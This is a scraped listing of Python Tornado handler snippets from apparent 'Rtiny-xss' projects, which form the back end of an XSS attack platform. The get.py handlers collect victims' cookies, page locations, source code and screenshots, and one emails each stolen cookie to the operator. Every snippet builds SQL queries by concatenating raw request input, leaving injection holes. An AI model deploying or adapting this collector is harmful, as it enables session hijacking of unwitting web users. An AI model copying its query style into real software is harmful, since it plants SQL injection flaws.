예제 #1
0
파일: module.py 프로젝트: r0ker/Rtiny-xss
	def post(self, id, do):
		if id:
			row=db.ct("module", "*", "id="+id)
			if row:
				description = urlen(self.get_argument('description', 'None'))
				name = urlen(self.get_argument('name', 'None'))
				code = urlen(self.get_argument('code', 'None'))
				addtime = int(time.time())
				db.u(
					"module",
					"description='"+description+"',name='"+name+"',code='"+code+"',addtime="+str(addtime), "id="+id)
				self.redirect("http://"+URL+"/module")
			else:
				self.render('404.html')
		else:
			if do == 'add':
				description = urlen(self.get_argument('description', 'None'))
				name = urlen(self.get_argument('name', 'None'))
				code = urlen(self.get_argument('code', 'None'))
				addtime = int(time.time())
				db.i(
					"module",
					"description,name,code,addtime",
					"'"+description+"','"+name+"','"+code+"','"+str(addtime)+"'")
				self.redirect("http://"+URL+"/module")
			elif do == 'del':
				db.d("module", "id in ("+self.get_argument('id')+")")
			else:
				self.render('404.html')
예제 #2
0
파일: module.py 프로젝트: ogresos/Rtiny-xss
 def post(self, id, do):
     if id:
         row = db.ct("module", "*", "id=" + id)
         if row:
             description = urlen(self.get_argument('description', 'None'))
             name = urlen(self.get_argument('name', 'None'))
             code = urlen(self.get_argument('code', 'None'))
             addtime = int(time.time())
             db.u(
                 "module", "description='" + description + "',name='" +
                 name + "',code='" + code + "',addtime=" + str(addtime),
                 "id=" + id)
             self.redirect("http://" + URL + "/module")
         else:
             self.render('404.html')
     else:
         if do == 'add':
             description = urlen(self.get_argument('description', 'None'))
             name = urlen(self.get_argument('name', 'None'))
             code = urlen(self.get_argument('code', 'None'))
             addtime = int(time.time())
             db.i(
                 "module", "description,name,code,addtime",
                 "'" + description + "','" + name + "','" + code + "','" +
                 str(addtime) + "'")
             self.redirect("http://" + URL + "/module")
         elif do == 'del':
             db.d("module", "id in (" + self.get_argument('id') + ")")
         else:
             self.render('404.html')
예제 #3
0
파일: project.py 프로젝트: jjflyxss/xss
	def post(self, id, do):
		if id:
			if do == 'del':
				hostip = self.get_argument('hostip').split(',')
				hostlist = json.loads(db.ct("project","hosts","id="+id)['hosts'])
				hostips = ''
				for x in hostip:
					hostlist.remove(x)
					hostips += "'"+x+"',"
				print hostlist,hostips
				db.u("project", "hosts='"+json.dumps(hostlist)+"'", "id="+id)
				db.d("host", "hostip in ("+hostips[:-1]+") and projectid="+id)
			else:
				row = db.ct("project", "*", "id="+id)
				if row:
					post_data = {}
					for key in self.request.arguments:
						post_data[key] = self.get_arguments(key)
					i = 0
					module = {}
					if 'moduleid' in post_data:
						for key in post_data['moduleid']:
							module[key] = urlen(post_data['modulecustom'][i])
							i += 1
						module = json.dumps(module)
					else:
						module = '[]'
					addtime = int(time.time())
					db.u(
						"project",
						"name='"+urlen(post_data['name'][0])+"',description='"+urlen(post_data['description'][0])+"',email='"+post_data['email'][0]+
						"',custom='"+urlen(post_data['custom'][0])+"',fip='"+post_data['fip'][0]+"',furl='"+post_data['furl'][0]+"',status='"+post_data['status'][0]+
						"',module='"+module+"',addtime="+str(addtime), "id="+id)
					self.redirect("http://"+URL+"/project")
				else:
					self.render('404.html')
		else:
			if do == 'add':
				post_data = {}
				for key in self.request.arguments:
					post_data[key] = self.get_arguments(key)
				i = 0
				module = {}
				if 'moduleid' in post_data:
					for key in post_data['moduleid']:
						module[key]=urlen(post_data['modulecustom'][i])
						i += 1
					module = json.dumps(module)
				else:
					module = '[]'
				addtime = int(time.time())
				db.i(
					"project","name,description,email,custom,fip,furl,status,hosts,module,addtime","'"+urlen(post_data['name'][0])+"','"+
					urlen(post_data['description'][0])+"','"+post_data['email'][0]+"','"+urlen(post_data['custom'][0])+"','"+post_data['fip'][0]+"','"+
					post_data['furl'][0]+"','"+post_data['status'][0]+"','[]','"+module+"','"+str(addtime)+"'")
				self.redirect("http://"+URL+"/project")
			elif do == 'del':
				db.d("project", "id in ("+self.get_argument('id')+")")
예제 #4
0
파일: sock.py 프로젝트: jjflyxss/xss
	def on_message(self, message):
		if self.name == 'manager':
			message = json.loads(message)
			self.broadcast(filter(lambda x:x.name == message['hostip'], self.participants), message['msg'])
		else:
			try:
				db.i('msglog',"msg","'"+message+"'")
			except Exception,e:
				self.send(str(e))
			self.broadcast(filter(lambda x:x.name == 'manager', self.participants), message)
예제 #5
0
파일: get.py 프로젝트: ogresos/Rtiny-xss
	def post(self, id, do):
		def getname(id):
			return urlde(db.ct("project", "name", "id="+str(id))['name'])
		hostip = self.request.headers['Remote-Ip']
		information = self.get_argument('information', 'None')
		sourcecode = self.get_argument('code', 'None')
		screen = self.get_argument('screen', 'None')
		receive = self.get_argument('receive', 'None')
		if not information == 'None':
			addtime = int(time.time())
			request = self.request.headers
			headers = {
				'user-agent': urlen('user-agent' in request and request['user-agent'] or 'None'),
				'Accept-Language': urlen('Accept-Language' in request and request['Accept-Language'] or 'None'),
				'X-Forwarded-For': urlen('X-Forwarded-For' in request and request['X-Forwarded-For'] or 'None'),
				'Referer': urlen('Referer' in request and request['Referer'] or 'None'),
				}
			headers = json.dumps(headers)
			db.i(
				'host',
				'hostip,information,headers,projectid,addtime',
				"'"+hostip+"','"+urlen(information)+"','"+headers+"','"+id+"','"+str(addtime)+"'")
			hosts = json.loads(db.ct('project', "hosts", "id="+id)['hosts'])
			hosts.append(hostip)
			db.u("project", "hosts='"+json.dumps(list(set(hosts)))+"'", "id="+id)
			emails = urlde(db.ct("project", "email", "id=" + id)['email']).split(";")
			information = json.loads(information)
			print information
			for email in emails:
				text = 'location : ' + information['location'] + "<p>" +"cookie : " + information['cookie']
				sendmail(email,'The cookie is coming ['+hostip+']', '<h1>project: '+ getname(id) + "</h1><p>" + text)
		hostid = db.ct('host', 'id', "hostip='"+hostip+"' order by id desc limit 1")['id']
		if not sourcecode == 'None':
			db.u('host', "sourcecode='"+urlen(sourcecode)+"'", 'id='+str(hostid))
		if not screen == 'None':
			db.u('host', "screen='"+urlen(screen)+"'", 'id='+str(hostid))
		if not receive == 'None':
			oldreceive = urlde(db.ct(
				'host',
				'receive',
				'id='+str(hostid))['receive'] and db.ct('host', 'receive', 'id='+str(hostid))['receive'] or '')
			oldreceive = oldreceive and json.loads(oldreceive) or oldreceive
			if oldreceive:
				receive = json.loads(receive)
				for key in oldreceive:
					receive[key] = oldreceive[key]
				receive = json.dumps(receive)
			db.u('host', "receive='"+urlen(receive)+"'", 'id='+str(hostid))
		x=db.cts("host", "*", "projectid=5")
		self.write(json.dumps(x))
예제 #6
0
파일: get.py 프로젝트: jjflyxss/xss
	def post(self, id, do):
		def getname(id):
			return urlde(db.ct("project", "name", "id="+str(id))['name'])
		hostip = self.request.remote_ip
		information = self.get_argument('information', 'None')
		sourcecode = self.get_argument('code', 'None')
		screen = self.get_argument('screen', 'None')
		receive = self.get_argument('receive', 'None')
		if not information == 'None':
			addtime = int(time.time())
			request = self.request.headers
			headers = {
				'user-agent': urlen('user-agent' in request and request['user-agent'] or 'None'),
				'Accept-Language': urlen('Accept-Language' in request and request['Accept-Language'] or 'None'),
				'X-Forwarded-For': urlen('X-Forwarded-For' in request and request['X-Forwarded-For'] or 'None'),
				'Referer': urlen('Referer' in request and request['Referer'] or 'None'),
				}
			headers = json.dumps(headers)
			db.i(
				'host',
				'hostip,information,headers,projectid,addtime',
				"'"+hostip+"','"+urlen(information)+"','"+headers+"','"+id+"','"+str(addtime)+"'")
			hosts = json.loads(db.ct('project', "hosts", "id="+id)['hosts'])
			hosts.append(hostip)
			db.u("project", "hosts='"+json.dumps(list(set(hosts)))+"'", "id="+id)
			emails = urlde(db.ct("project", "email", "id=" + id)['email']).split(";")
			information = json.loads(information)
			print information
			for email in emails:
				text = 'location : ' + information['location'] + "<p>" +"cookie : " + information['cookie']

		hostid = db.ct('host', 'id', "hostip='"+hostip+"' order by id desc limit 1")['id']
		if not sourcecode == 'None':
			db.u('host', "sourcecode='"+urlen(sourcecode)+"'", 'id='+str(hostid))
		if not screen == 'None':
			db.u('host', "screen='"+urlen(screen)+"'", 'id='+str(hostid))
		if not receive == 'None':
			oldreceive = urlde(db.ct(
				'host',
				'receive',
				'id='+str(hostid))['receive'] and db.ct('host', 'receive', 'id='+str(hostid))['receive'] or '')
			oldreceive = oldreceive and json.loads(oldreceive) or oldreceive
			if oldreceive:
				receive = json.loads(receive)
				for key in oldreceive:
					receive[key] = oldreceive[key]
				receive = json.dumps(receive)
			db.u('host', "receive='"+urlen(receive)+"'", 'id='+str(hostid))
		x=db.cts("host", "*", "projectid=5")
		self.write(json.dumps(x))
예제 #7
0
파일: project.py 프로젝트: r0ker/Rtiny-xss
 def post(self, id, do):
     if id:
         if do == "del":
             hostip = self.get_argument("hostip").split(",")
             hostlist = json.loads(db.ct("project", "hosts", "id=" + id)["hosts"])
             for x in hostip:
                 hostlist.remove(x)
                 hostips = "'" + x + "',"
             db.u("project", "hosts='" + json.dumps(hostlist) + "'", "id=" + id)
             db.d("host", "hostip in (" + hostips[:-1] + ") and projectid=" + id)
         else:
             row = db.ct("project", "*", "id=" + id)
             if row:
                 post_data = {}
                 for key in self.request.arguments:
                     post_data[key] = self.get_arguments(key)
                 i = 0
                 module = {}
                 if "moduleid" in post_data:
                     for key in post_data["moduleid"]:
                         module[key] = urlen(post_data["modulecustom"][i])
                         i += 1
                     module = json.dumps(module)
                 else:
                     module = "[]"
                 addtime = int(time.time())
                 db.u(
                     "project",
                     "name='"
                     + urlen(post_data["name"][0])
                     + "',description='"
                     + urlen(post_data["description"][0])
                     + "',email='"
                     + post_data["email"][0]
                     + "',custom='"
                     + urlen(post_data["custom"][0])
                     + "',fip='"
                     + post_data["fip"][0]
                     + "',furl='"
                     + post_data["furl"][0]
                     + "',status='"
                     + post_data["status"][0]
                     + "',module='"
                     + module
                     + "',addtime="
                     + str(addtime),
                     "id=" + id,
                 )
                 self.redirect("http://" + URL + "/project")
             else:
                 self.render("404.html")
     else:
         if do == "add":
             post_data = {}
             for key in self.request.arguments:
                 post_data[key] = self.get_arguments(key)
             i = 0
             module = {}
             if "moduleid" in post_data:
                 for key in post_data["moduleid"]:
                     module[key] = urlen(post_data["modulecustom"][i])
                     i += 1
                 module = json.dumps(module)
             else:
                 module = "[]"
             addtime = int(time.time())
             db.i(
                 "project",
                 "name,description,email,custom,fip,furl,status,hosts,module,addtime",
                 "'"
                 + urlen(post_data["name"][0])
                 + "','"
                 + urlen(post_data["description"][0])
                 + "','"
                 + post_data["email"][0]
                 + "','"
                 + urlen(post_data["custom"][0])
                 + "','"
                 + post_data["fip"][0]
                 + "','"
                 + post_data["furl"][0]
                 + "','"
                 + post_data["status"][0]
                 + "','[]','"
                 + module
                 + "','"
                 + str(addtime)
                 + "'",
             )
             self.redirect("http://" + URL + "/project")
         elif do == "del":
             db.d("project", "id in (" + self.get_argument("id") + ")")
예제 #8
0
 def post(self, id, do):
     if id:
         if do == 'del':
             hostip = self.get_argument('hostip').split(',')
             hostlist = json.loads(
                 db.ct("project", "hosts", "id=" + id)['hosts'])
             for x in hostip:
                 hostlist.remove(x)
                 hostips = "'" + x + "',"
             db.u("project", "hosts='" + json.dumps(hostlist) + "'",
                  "id=" + id)
             db.d("host",
                  "hostip in (" + hostips[:-1] + ") and projectid=" + id)
         else:
             row = db.ct("project", "*", "id=" + id)
             if row:
                 post_data = {}
                 for key in self.request.arguments:
                     post_data[key] = self.get_arguments(key)
                 i = 0
                 module = {}
                 if 'moduleid' in post_data:
                     for key in post_data['moduleid']:
                         module[key] = urlen(post_data['modulecustom'][i])
                         i += 1
                     module = json.dumps(module)
                 else:
                     module = '[]'
                 addtime = int(time.time())
                 db.u(
                     "project", "name='" + urlen(post_data['name'][0]) +
                     "',description='" +
                     urlen(post_data['description'][0]) + "',email='" +
                     post_data['email'][0] + "',custom='" +
                     urlen(post_data['custom'][0]) + "',fip='" +
                     post_data['fip'][0] + "',furl='" +
                     post_data['furl'][0] + "',status='" +
                     post_data['status'][0] + "',module='" + module +
                     "',addtime=" + str(addtime), "id=" + id)
                 self.redirect("http://" + URL + "/project")
             else:
                 self.render('404.html')
     else:
         if do == 'add':
             post_data = {}
             for key in self.request.arguments:
                 post_data[key] = self.get_arguments(key)
             i = 0
             module = {}
             if 'moduleid' in post_data:
                 for key in post_data['moduleid']:
                     module[key] = urlen(post_data['modulecustom'][i])
                     i += 1
                 module = json.dumps(module)
             else:
                 module = '[]'
             addtime = int(time.time())
             db.i(
                 "project",
                 "name,description,email,custom,fip,furl,status,hosts,module,addtime",
                 "'" + urlen(post_data['name'][0]) + "','" +
                 urlen(post_data['description'][0]) + "','" +
                 post_data['email'][0] + "','" +
                 urlen(post_data['custom'][0]) + "','" +
                 post_data['fip'][0] + "','" + post_data['furl'][0] +
                 "','" + post_data['status'][0] + "','[]','" + module +
                 "','" + str(addtime) + "'")
             self.redirect("http://" + URL + "/project")
         elif do == 'del':
             db.d("project", "id in (" + self.get_argument('id') + ")")